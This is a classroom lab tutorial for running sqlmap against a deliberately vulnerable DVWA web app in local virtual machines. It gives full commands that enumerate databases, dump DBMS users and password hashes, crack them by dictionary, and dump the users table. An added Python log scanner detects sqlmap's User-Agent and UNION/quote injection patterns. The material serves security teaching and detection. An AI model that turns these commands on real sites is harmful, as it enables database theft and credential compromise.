Section 0. Background Information
- What is Damn Vulnerable Web App (DVWA)?
  - Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable.
  - Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, to help web developers better understand the processes of securing web applications, and to aid teachers/students to teach/learn web application security in a classroom environment.
- What is sqlmap?
  - sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester, and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
- Pre-Requisite Labs
  - Damn Vulnerable Web App (DVWA): Lesson 1: How to Install DVWA in Fedora 14
  - Damn Vulnerable Web App (DVWA): Lesson 4: Using Metasploit with Command Execution (Required)
  - Damn Vulnerable Web App (DVWA): Lesson 5: Using Tamper Data with crack_web_form.pl
  - Damn Vulnerable Web App (DVWA): Lesson 6: Manual SQL Injection, John the Ripper
- Lab Notes
  - In this lab we will use sqlmap to obtain the following pieces of information:
    - A list of Database Management Usernames and Passwords.
    - A list of databases.
    - A list of tables for a specified database.
    - A list of users and passwords for a specified database table.
- Legal Disclaimer
  - This document is for educational purposes.
Section 1. Configure Fedora14 Virtual Machine Settings
- Open Your VMware Player
  - Instructions:
    - On Your Host Computer, Go To
    - Start --> All Program --> VMWare --> VMWare Player
- Edit Fedora14 Virtual Machine Settings
  - Instructions:
    - Highlight fedora14
    - Click Edit virtual machine settings
- Edit Network Adapter
  - Instructions:
    - Highlight Network Adapter
    - Select Bridged
    - Click on the OK Button.
Section 2. Login to Fedora14
- Start Fedora14 VM Instance
  - Instructions:
    - Start Up VMWare Player
    - Select Fedora14
    - Play virtual machine
- Login to Fedora14
  - Instructions:
    - Login: student
    - Password: <whatever you set it to>.
Section 3. Open Console Terminal and Retrieve IP Address
- Start a Terminal Console
  - Instructions:
    - Applications --> Terminal
- Switch user to root
  - Instructions:
    - su - root
    - <Whatever you set the root password to>
- Get IP Address
  - Instructions:
    - ifconfig -a
  - Notes:
    - As indicated below, my IP address is 192.168.1.106.
    - Please record your IP address.
Section 4. Temporarily Disable SELINUX and Firewall
- Start a Terminal Console
  - Instructions:
    - sestatus
    - If "SELinux status:" is set to disabled OR "Current mode:" is set to permissive, skip the next steps and continue to the next section.
    - If "SELinux status:" is set to enabled AND "Current mode:" is set to enforcing, continue with the next steps.
  - Notes:
    - In my case, I need to temporarily put SELinux in permissive mode to demonstrate basic attacks on DVWA.
- Place SELinux in permissive mode
  - Instructions:
    - echo 0 > /selinux/enforce
      - Placing a "0" in the enforce file puts SELinux in permissive mode.
    - sestatus
      - Notice that "Current mode:" changed to permissive.
- Disable Firewall
  - Instructions:
    - service iptables save
      - This is not really necessary, unless you have made recent changes to the firewall.
    - service iptables stop
      - This command disables the firewall.
Section 5. Configure BackTrack Virtual Machine Settings
- Open Your VMware Player
  - Instructions:
    - On Your Host Computer, Go To
    - Start --> All Program --> VMWare --> VMWare Player
- Edit BackTrack Virtual Machine Settings
  - Instructions:
    - Highlight BackTrack5R1
    - Click Edit virtual machine settings
- Edit Network Adapter
  - Instructions:
    - Highlight Network Adapter
    - Select Bridged
    - Do not Click on the OK Button.
Section 6. Login to BackTrack
- Start BackTrack VM Instance
  - Instructions:
    - Start Up VMWare Player
    - Select BackTrack5R1
    - Play virtual machine
- Login to BackTrack
  - Instructions:
    - Login: root
    - Password: toor or <whatever you changed it to>.
- Bring up the GNOME desktop
  - Instructions:
    - Type startx
Section 7. Open Console Terminal and Retrieve IP Address
- Open a console terminal
  - Instructions:
    - Click on the console terminal
- Get IP Address
  - Instructions:
    - ifconfig -a
  - Notes:
    - As indicated below, my IP address is 192.168.1.105.
    - Please record your IP address.
Section 8. Login to DVWA
- Start Firefox
  - Instructions:
    - Click on Firefox
- Login to DVWA
  - Instructions:
    - Start up Firefox on BackTrack
    - Place http://192.168.1.106/dvwa/login.php in the address bar.
      - Replace 192.168.1.106 with Fedora's IP address obtained in (Section 3, Step 3).
    - Login: admin
    - Password: password
    - Click on Login
Section 9. Set Security Level
- Set DVWA Security Level
  - Instructions:
    - Click on DVWA Security, in the left hand menu.
    - Select "low"
    - Click Submit
Section 10. Obtain PHP Cookie
- SQL Injection Menu
  - Instructions:
    - Select "SQL Injection" from the left navigation menu.
- Select Tamper Data
  - Instructions:
    - Tools --> Tamper Data
- Start Tamper Data
  - Instructions:
    - Click on Start Tamper
- Basic Injection
  - Instructions:
    - Input "1" into the text box.
    - Click Submit.
  - Note:
    - The goal here is to see the GET request that is made to the CGI program behind the scenes.
    - Also, we will use the "Surname" output with sqlmap to obtain database username and password contents.
- Tamper with request?
  - Instructions:
    - Make sure the "Continue Tampering?" checkbox is unchecked.
    - Then click Submit
- Copying the Referer URL
  - Instructions:
    - Select the second GET Request
    - Right Click on the Referer Link
    - Select Copy
- Open Notepad
  - Instructions:
    - Applications --> Wine --> Programs --> Accessories --> Notepad
- Paste Referer URL into Notepad
  - Instructions:
    - Edit --> Paste
- Copying the Cookie Information
  - Instructions:
    - Right Click on the Cookie line
    - Select Copy
- Pasting the Cookie Information
  - Instructions:
    - Edit --> Paste
  - Notes:
    - Now you should have copied both the Referer and Cookie lines into Notepad. (See Picture)
Section 11. Using SqlMap to Obtain Current User and Database
- Verify sqlmap.py exists
  - Instructions:
    - cd /pentest/database/sqlmap
    - ls -l sqlmap.py
- Obtain Database User For DVWA
  - Note:
    - Obtain the referer link from (Section 10, Step 10), which is placed after the "-u" flag below.
    - Obtain the cookie line from (Section 10, Step 10), which is placed after the "--cookie" flag below.
  - Instructions:
    - ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -b --current-db --current-user
      - -u, Target URL
      - --cookie, HTTP Cookie header
      - -b, Retrieve DBMS banner
      - --current-db, Retrieve DBMS current database
      - --current-user, Retrieve DBMS current user
- Do you want to keep testing?
  - Instructions:
    - keep testing? y
    - skip payloads? y
- Viewing Results
  - Instructions:
    - For the web application DVWA, the current database is "dvwa" and the DBMS user that the application connects as is "root@localhost".
Section 12. Using SqlMap to Obtain Database Management Username and Password
- NOTE: You must have completed Lesson 4 to see the db_hacker in Step 2.
- Obtain Database Management Username and Password
  - Instructions:
    - ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" --string="Surname" --users --password
      - -u, Target URL
      - --cookie, HTTP Cookie header
      - --string, A string that is present in the response whenever the injected query evaluates to true (here "Surname", which only appears for a valid id), so sqlmap can tell true from false responses.
      - --users, list database management system users
      - --password, list the password hashes of the database management system users.
- Obtain Database Management Username and Password (Part 2)
  - Instructions:
    - Use Dictionary Attack? Y
    - Dictionary Location? <Press Enter>
  - Notes:
    - Notice the password for username db_hacker was cracked.
- Obtain db_hacker Database Privileges
  - Instructions:
    - ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -U db_hacker --privileges
      - -u, Target URL
      - --cookie, HTTP Cookie header
      - -U, Specify database management user
      - --privileges, list database management system user's privileges
- View Results: Obtain db_hacker Database Privileges
  - Notes:
    - Notice that DBMS user "db_hacker" has administrative privileges.
    - Notice that "db_hacker" can log in from anywhere, via the "%" host wildcard.
Section 13. Obtain a list of all Databases
- Obtain a list of all databases
  - Note:
    - Obtain the referer link from (Section 10, Step 10), which is placed after the "-u" flag below.
    - Obtain the cookie line from (Section 10, Step 10), which is placed after the "--cookie" flag below.
  - Instructions:
    - ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" --dbs
      - -u, Target URL
      - --cookie, HTTP Cookie header
      - --dbs, List database management system's databases.
- Review Results: Obtain a list of all databases
  - Note:
    - Notice that sqlmap supplies a list of available databases.
Section 14. Obtain "dvwa" tables and contents
- Obtain "dvwa" tables
  - Note:
    - Obtain the referer link from (Section 10, Step 10), which is placed after the "-u" flag below.
    - Obtain the cookie line from (Section 10, Step 10), which is placed after the "--cookie" flag below.
  - Instructions:
    - ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -D dvwa --tables
      - -u, Target URL
      - --cookie, HTTP Cookie header
      - -D, Specify Database
      - --tables, List Database Tables
- Viewing "dvwa" tables results
  - Note:
    - Notice sqlmap listed two tables: guestbook and users.
- Obtain columns for table dvwa.users
  - Instructions:
    - ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -D dvwa -T users --columns
      - -u, Target URL
      - --cookie, HTTP Cookie header
      - -D, Specify Database
      - -T, Specify the Database Table
      - --columns, List the Columns of the Database Table.
- Viewing Results: columns for table dvwa.users
  - Note:
    - Notice that there are both user and password columns in the dvwa.users table.
- Obtain Users and their Passwords from table dvwa.users (Part 1)
  - Instructions:
    - ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -D dvwa -T users -C user,password --dump
      - -u, Target URL
      - --cookie, HTTP Cookie header
      - -D, Specify Database
      - -T, Specify the Database Table
      - -C, Specify the columns to retrieve (here user and password)
      - --dump, Dump table contents
- Obtain Users and their Passwords from table dvwa.users (Part 2)
  - Instructions:
    - Do you want to use the LIKE operator? Y
    - Recognize possible HASH values? Y
    - What's the dictionary location? <Press Enter>
    - Use common password suffixes? y
- Review Results: Users and their Passwords from table dvwa.users
  - Notes:
    - Notice how sqlmap nicely displays the cracked passwords for each user.
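From the defender's side, every sqlmap run in Sections 11 to 14 leaves a trail in the Fedora host's Apache access log: a burst of GET requests to /dvwa/vulnerabilities/sqli/ whose numeric id parameter carries quotes, boolean conditions or UNION clauses, often with sqlmap's self-identifying default User-Agent. The following Python script is an added example (not part of the original lab or of sqlmap/DVWA) that scans constructed combined-format log lines for both signals; the IPs, timestamps and payloads in SAMPLE_LOG are made up to mirror this lab.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Apache "combined" log format. Only ip, path and ua are used below.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
                    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# Constructed sample lines: one real browser request from the lab, then
# three of the kind sqlmap produces while testing the id parameter.
SAMPLE_LOG = [
    '192.168.1.105 - - [10/Jan/2012:10:00:01 -0500] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4310 "http://192.168.1.106/dvwa/vulnerabilities/sqli/" "Mozilla/5.0 (X11; Linux i686) Firefox/10.0"',
    '192.168.1.105 - - [10/Jan/2012:10:05:12 -0500] "GET /dvwa/vulnerabilities/sqli/?id=1%27&Submit=Submit HTTP/1.1" 200 4120 "-" "sqlmap/1.0-dev (http://sqlmap.org)"',
    '192.168.1.105 - - [10/Jan/2012:10:05:13 -0500] "GET /dvwa/vulnerabilities/sqli/?id=1%20AND%201%3D1&Submit=Submit HTTP/1.1" 200 4310 "-" "Mozilla/5.0 (compatible)"',
    '192.168.1.105 - - [10/Jan/2012:10:05:14 -0500] "GET /dvwa/vulnerabilities/sqli/?id=1%20UNION%20SELECT%20user%2Cpassword%20FROM%20users--%20&Submit=Submit HTTP/1.1" 200 4500 "-" "Mozilla/5.0 (compatible)"',
]

# Substrings that never belong in a purely numeric id such as DVWA's.
INJECTION_MARKERS = ("'", '"', " and ", " or ", "union", "select", "sleep(", "--", "#", "/*")


def classify(line):
    """Return (ip, reason) for a suspicious request, or None for a benign one."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # sqlmap's default User-Agent names the tool. This check is cheap but easy
    # to evade, so the payload check below is the one that actually matters.
    if m.group("ua").lower().startswith("sqlmap"):
        return (m.group("ip"), "sqlmap user-agent")
    query = parse_qs(urlsplit(m.group("path")).query)   # parse_qs percent-decodes once
    for value in query.get("id", []):
        v = unquote_plus(value).lower()                  # decode again for double-encoded input
        if not v.isdigit() and any(mark in v for mark in INJECTION_MARKERS):
            return (m.group("ip"), "injection pattern in id=%r" % value)
    return None


def analyze(lines):
    """Run classify over every log line and return the list of findings."""
    return [hit for hit in map(classify, lines) if hit]


if __name__ == "__main__":
    for ip, reason in analyze(SAMPLE_LOG):
        print(ip, reason)
```

Pointing analyze at the real log (for example, /var/log/httpd/access_log on the Fedora host) turns the lab into a detection exercise: the same run that dumps dvwa.users should show up as dozens of flagged requests from the BackTrack IP.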
Section 15. Proof of Lab Using John the Ripper
- Proof of Lab
  - Instructions:
    - Bring up a new terminal, see (Section 7, Step 1)
    - cd /pentest/database/sqlmap
    - find output/* -print | xargs ls -l
    - date
    - echo "Your Name"
      - Replace the string "Your Name" with your actual name.
      - e.g., echo "John Gray"
  - Proof of Lab Instructions:
    - Do a <PrtScn>
    - Paste into a word document
    - Email 2 CSIRT247@Gmail.Com